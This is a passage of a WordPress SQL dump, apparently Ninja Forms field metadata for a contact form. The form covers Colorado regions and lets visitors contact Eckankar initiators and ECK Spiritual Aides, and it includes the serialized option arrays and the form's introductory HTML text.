dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8890,246,'field_label','First Name','field_label','First Name'),(8891,246,'field_key','textbox_190','field_key','textbox_190'),(8892,246,'custom_name_attribute','','custom_name_attribute',''),(8893,246,'personally_identifiable','','personally_identifiable',''),(8894,246,'value','','value',''),(8895,247,'field_label','Last Name','field_label','Last Name'),(8896,247,'field_key','lastname_191','field_key','lastname_191'),(6870,238,'key','listselect_182','key','listselect_182'),(6871,238,'container_class','one-half first','container_class','one-half first'),(6872,238,'parent_id','22','parent_id','22'),(6904,241,'objectType','Field','objectType','Field'),(6905,241,'objectDomain','fields','objectDomain','fields'),(6906,241,'editActive','','editActive',''),(6907,241,'order','7','order','7'),(6908,241,'type','listselect','type','listselect'),(6909,241,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(6910,241,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6911,241,'label_pos','above','label_pos','above'),(6912,241,'list_type','dropdown','list_type','dropdown'),(6913,241,'multi_size','5','multi_size','5'),(6914,241,'list_show_value','1','list_show_value','1'),(6915,241,'list','a:0:{}','list','a:0:{}'),(6916,241,'user_info_field_group','','user_info_field_group',''),(6917,241,'calc_auto_include','0','calc_auto_include','0'),(6918,241,'user_state','0','user_state','0'),(6919,241,'num_sort','0','num_sort','0'),(6920,241,'admin_label','','admin_label',''),(6921,241,'show_help','0','show_help','0'),(6922,241,'help_text','','help_text',''),(6923,241,'show_desc','0','show_desc','0'),(6924,241,'desc_pos','none','desc_pos','none'),(6925,241,'desc_text','','desc_text',''),(6926,241,'element_class','','element_class',''),(6927,241,'required','1','required','1'),(6928,241,'options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Initiator-Joe Wells\";s:5:\"value\";s:19:\"Initiator-Joe Wells\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Initiator-Joe Wells\";s:5:\"value\";s:19:\"Initiator-Joe Wells\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8888,245,'field_label','Text','field_label','Text'),(8889,245,'field_key','html_189','field_key','html_189'),(6929,241,'key','select_the_person_you_would_like_to_contact_1613166886411','key','select_the_person_you_would_like_to_contact_1613166886411'),(6930,241,'container_class','one-half','container_class','one-half'),(6931,241,'parent_id','22','parent_id','22'),(6932,242,'objectType','Field','objectType','Field'),(6933,242,'objectDomain','fields','objectDomain','fields'),(6934,242,'editActive','','editActive',''),(6935,242,'order','8','order','8'),(6936,242,'type','textarea','type','textarea'),(6937,242,'label','Enter Your Message Here','label','Enter Your Message Here'),(6938,242,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6939,242,'label_pos','above','label_pos','above'),(6940,242,'default_value','','default_value',''),(6941,242,'textarea_rte','0','textarea_rte','0'),(6942,242,'textarea_media','0','textarea_media','0'),(6943,242,'disable_rte_mobile','0','disable_rte_mobile','0'),(6944,242,'input_limit','','input_limit',''),(6945,242,'input_limit_type','char','input_limit_type','char'),(6946,242,'calc_auto_include','0','calc_auto_include','0'),(6947,242,'num_sort','0','num_sort','0'),(6948,242,'admin_label','','admin_label',''),(6949,242,'show_help','0','show_help','0'),(6950,242,'help_text','','help_text',''),(6951,242,'show_desc','0','show_desc','0'),(6952,242,'desc_pos','none','desc_pos','none'),(6953,242,'desc_text','','desc_text',''),(6954,242,'element_class','','element_class',''),(6955,242,'required','1','required','1'),(6956,242,'default','','default',''),(6957,242,'key','textarea_186','key','textarea_186'),(6958,242,'placeholder','','placeholder',''),(6959,242,'container_class','','container_class',''),(6960,242,'manual_key','','manual_key',''),(6961,242,'parent_id','22','parent_id','22'),(17419,616,'idAttribute','id','idAttribute','id'),(17418,616,'order','9','order','9'),(17417,616,'editActive','','editActive',''),(17416,615,'key','html_1663797570022','key','html_1663797570022'),(17415,615,'element_class','','element_class',''),(17413,615,'default','','default',''),(17414,615,'container_class','','container_class',''),(17412,615,'label','HTML','label','HTML'),(17411,615,'type','html','type','html'),(17410,615,'idAttribute','id','idAttribute','id'),(17409,615,'order','11','order','11'),(17408,615,'editActive','','editActive',''),(17407,614,'drawerDisabled','','drawerDisabled',''),(17406,614,'key','html_1663797572453','key','html_1663797572453'),(17405,614,'element_class','','element_class',''),(6979,244,'objectType','Field','objectType','Field'),(6980,244,'objectDomain','fields','objectDomain','fields'),(6981,244,'editActive','','editActive',''),(6982,244,'order','10','order','10'),(6983,244,'type','submit','type','submit'),(6984,244,'label','Submit','label','Submit'),(6985,244,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6986,244,'show_help','0','show_help','0'),(6987,244,'help_text','','help_text',''),(6988,244,'show_desc','0','show_desc','0'),(6989,244,'desc_pos','none','desc_pos','none'),(6990,244,'desc_text','','desc_text',''),(6991,244,'processing_label','Processing','processing_label','Processing'),(6992,244,'element_class','','element_class',''),(6993,244,'key','submit_188','key','submit_188'),(6994,244,'container_class','','container_class',''),(6995,244,'parent_id','22','parent_id','22'),(6996,245,'objectType','Field','objectType','Field'),(6997,245,'objectDomain','fields','objectDomain','fields'),(6998,245,'editActive','','editActive',''),(6999,245,'order','1','order','1'),(7000,245,'type','html','type','html'),(7001,245,'label','Text','label','Text'),(7002,245,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7003,245,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Southwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a 